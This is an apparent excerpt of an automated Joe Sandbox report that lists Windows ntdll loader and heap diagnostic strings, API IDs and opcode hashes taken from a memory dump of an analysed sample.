                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 0-523794902
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.S5
                                                                                      • API String ID: 0-1093851986
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                      • API String ID: 0-122214566
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-792281065
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 35581F6A, 35581FA4, 35581FC4
                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 35581F8A
                                                                                      • SXS: %s() passed the empty activation context, xrefs: 35581F6F
                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 35581FC9
                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 35581FA9
                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 35581F82
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                      • API String ID: 0-861424205
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 0-4253913091
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                      • API String ID: 3446177414-2283098728
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      • Failed to reallocate the system dirs string !, xrefs: 355880E2
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 355880F3
                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 355880E9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-1783798831
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 35594508
                                                                                      • LdrpCheckRedirection, xrefs: 3559450F
                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 35594519
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                      • API String ID: 3446177414-3154609507
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlReAllocateHeap
                                                                                      • API String ID: 0-941669491
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 35510586
                                                                                      • kLsE, xrefs: 355105FE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                      • API String ID: 3446177414-2547482624
                                                                                      • Opcode ID: 8798ffe42728f26475469f58bf9075d76b8c045a5d6775d55324ca277e251126
                                                                                      • Instruction ID: 13660cd9e4186e5a47e44ad5c455904db6a1f30a55d6efdebcd8ceced734e8ea
                                                                                      • Opcode Fuzzy Hash: 8798ffe42728f26475469f58bf9075d76b8c045a5d6775d55324ca277e251126
                                                                                      • Instruction Fuzzy Hash: 4F51BEB6A01745DFEB10DFA6C440AABBBF4BF44304F01483ED99687260EB74B645CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                      • API String ID: 0-2084224854
                                                                                      • Opcode ID: 22d6b61a1099e9be2892088630c063f115e10618c55bd6de72499feb578f4550
                                                                                      • Instruction ID: 43d24df15081480e65f63db2cf66d42199a277758fcd802e893ddc39e4191d3e
                                                                                      • Opcode Fuzzy Hash: 22d6b61a1099e9be2892088630c063f115e10618c55bd6de72499feb578f4550
                                                                                      • Instruction Fuzzy Hash: D2E1DF74A047859BEB14CF68C490B7ABBF1BF48314F548899E896CB645EB74FA40CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LUN5$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                      • API String ID: 0-3214703027
                                                                                      • Opcode ID: 66d2d4a50dad7fb441128b8b2efa44b96992e5c8f6c614416de140604925bf4d
                                                                                      • Instruction ID: 92d49a7982ff6f4a6483c609c69a4693ec97fb788a6aa0adc7bf666d85874261
                                                                                      • Opcode Fuzzy Hash: 66d2d4a50dad7fb441128b8b2efa44b96992e5c8f6c614416de140604925bf4d
                                                                                      • Instruction Fuzzy Hash: B9B1BB76A047048BEB15CF64C990B9DBBB6BFA47A4F214829E951EB390D730FA40CB44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 35548341
                                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3554847E
                                                                                      • @, xrefs: 355484B1
                                                                                      • LdrpInitializeProcess, xrefs: 35548342
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-1918872054
                                                                                      • Opcode ID: 0deacd6094605405b7ea82008fdfc183f68d3e8cef83a953cd75002e0254c3aa
                                                                                      • Instruction ID: bcb4dc67373e69910ff53889f744b9befc6e42e261eb8dc90991dbb301001699
                                                                                      • Opcode Fuzzy Hash: 0deacd6094605405b7ea82008fdfc183f68d3e8cef83a953cd75002e0254c3aa
                                                                                      • Instruction Fuzzy Hash: D0916EB1608345AFE721DE20C840EABB7ECBB84798F80092EFA8592150E774E944CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • SXS: %s() passed the empty activation context, xrefs: 35581FE8
                                                                                      • .Local, xrefs: 355427F8
                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 355820C0
                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 35581FE3, 355820BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                      • API String ID: 0-1239276146
                                                                                      • Opcode ID: 8cd0cfda089c178be8705897b1f27a7cc5d7bb0ef05076c2bbee486b0d1a2609
                                                                                      • Instruction ID: dbcb36cdb0d5d04532d8161d3bd9970a167c10ed686177cd491c422718a57d6c
                                                                                      • Opcode Fuzzy Hash: 8cd0cfda089c178be8705897b1f27a7cc5d7bb0ef05076c2bbee486b0d1a2609
                                                                                      • Instruction Fuzzy Hash: 53A1ABB5A04329DBEB24CF64DC84B99B3B1BF58354F5105EAD809AB251DB70BE81CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 35570EB5
                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 35570DEC
                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 35570E2F
                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 35570E72
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                      • API String ID: 0-1468400865
                                                                                      • Opcode ID: 42b49d66c514bda344a280a034c9f45bb9edf47629859f3cf5a2493031ad7c31
                                                                                      • Instruction ID: 595767ff7511b2448acaab3c98b95340acbbddfbddc3a61c5c952d20e7982149
                                                                                      • Opcode Fuzzy Hash: 42b49d66c514bda344a280a034c9f45bb9edf47629859f3cf5a2493031ad7c31
                                                                                      • Instruction Fuzzy Hash: EA718DB59093449FEB50CF10C884F877FA9AF847A4F800869FC4A8B656D774E688CBD1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                      • API String ID: 0-2586055223
                                                                                      • Opcode ID: fb2959cdbca992c52cbf13ad9a564824e307154679f084ba42d8b98c9deec43f
                                                                                      • Instruction ID: fdc37f40a198b4efc46a4fe51f4f1ff4d3faa77762cd2ef9ba9f229c764b3d52
                                                                                      • Opcode Fuzzy Hash: fb2959cdbca992c52cbf13ad9a564824e307154679f084ba42d8b98c9deec43f
                                                                                      • Instruction Fuzzy Hash: 0061F0752493809FE311CB64C844F5BB7E9FF84B64F150869E955DB291CB34F840CB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                      • API String ID: 0-1391187441
                                                                                      • Opcode ID: 938a14466f071dd0f465e3e34ca7ef6d4fc6dece076e610e804ebb210fc27383
                                                                                      • Instruction ID: 17844fc227d566f086e1dc1a2031ddaa83f27d37f01781cbeedeb1836a25a2c1
                                                                                      • Opcode Fuzzy Hash: 938a14466f071dd0f465e3e34ca7ef6d4fc6dece076e610e804ebb210fc27383
                                                                                      • Instruction Fuzzy Hash: C231AF36A00245EFDB11CB94CC84F9EB7B9EF85774F5548A1E815AB291D730F940CE60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$eT5
                                                                                      • API String ID: 0-1788069083
                                                                                      • Opcode ID: 760b537d3be61d34daff739933b3035096550dba3921f427743609871724948b
                                                                                      • Instruction ID: 4401c054cb2b107285a73d6de0ecd049a324316ea63dcd683ebdcf747d0a7095
                                                                                      • Opcode Fuzzy Hash: 760b537d3be61d34daff739933b3035096550dba3921f427743609871724948b
                                                                                      • Instruction Fuzzy Hash: CE318172A00259BBDB11CFD5CC40EDFBB7DEB84760F804826E516A7260DB70EA05CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 6d7eb59476a48579b56f147feac6aa365e0005a76e7d0227a769314597d24b5c
                                                                                      • Instruction ID: de6a2ccbf56cf138850d3d0270803dc8435500535ce78cb6cd5c7bda4838ce3f
                                                                                      • Opcode Fuzzy Hash: 6d7eb59476a48579b56f147feac6aa365e0005a76e7d0227a769314597d24b5c
                                                                                      • Instruction Fuzzy Hash: FE51EF74A14705EFFB09CB68C844BADBBB6BF44351F10416AE81297290EBB4BA51CF80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • HEAP[%wZ]: , xrefs: 3556F6B1
                                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 3556F6D3
                                                                                      • HEAP: , xrefs: 3556F6BE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                      • API String ID: 0-3178619729
                                                                                      • Opcode ID: 01eb08a3d9a39c213db1a8d61490b8b2ac59f6dc7e7c583a3bdaab756475199c
                                                                                      • Instruction ID: e766236740f7ae0be2ba9c02de4ca1d0cdf81cc8ae2a05f6cda3b52247eb405a
                                                                                      • Opcode Fuzzy Hash: 01eb08a3d9a39c213db1a8d61490b8b2ac59f6dc7e7c583a3bdaab756475199c
                                                                                      • Instruction Fuzzy Hash: BF12B174B04396EFEB14CF24C480B6ABBE1BF45308F548599D896CB685DB70F981CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                      • API String ID: 0-1168191160
                                                                                      • Opcode ID: ad77c005ca9315d5629207269a18e47e810397d46e62d92c6ef78c031c0511ea
                                                                                      • Instruction ID: b147f467a47da207b3bb01f68caf5e8612eb3b374acc4f13a09b67370ed8ef6b
                                                                                      • Opcode Fuzzy Hash: ad77c005ca9315d5629207269a18e47e810397d46e62d92c6ef78c031c0511ea
                                                                                      • Instruction Fuzzy Hash: EBF192B6A042288BDB22CF14CC90BDDB3B5FF94758F5640E9D909A7240E730AE85CF94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                      • API String ID: 0-2779062949
                                                                                      • Opcode ID: f57020c37e9450abdf2e73321065d3aaa35882396280ceec2843986b7ac2cf5f
                                                                                      • Instruction ID: b8ea292bec1c2a3f4834a374be2b29e3b666c1777a0a30012216d62a94dd0c65
                                                                                      • Opcode Fuzzy Hash: f57020c37e9450abdf2e73321065d3aaa35882396280ceec2843986b7ac2cf5f
                                                                                      • Instruction Fuzzy Hash: B3A18D759016699BDB21DF24CC88B9EB3B8FF44714F5005EAE909A7250DB35AEC4CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • HEAP[%wZ]: , xrefs: 3556E435
                                                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3556E455
                                                                                      • HEAP: , xrefs: 3556E442
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                      • API String ID: 0-1340214556
                                                                                      • Opcode ID: 33168c09a65976f189ea7323749dca85acf5732a551fe50ec7f7df398a4d7e21
                                                                                      • Instruction ID: bb5a3aa2666c393eb05bdf222e8fffb1098008a9e086e2e35aa0a413c112a175
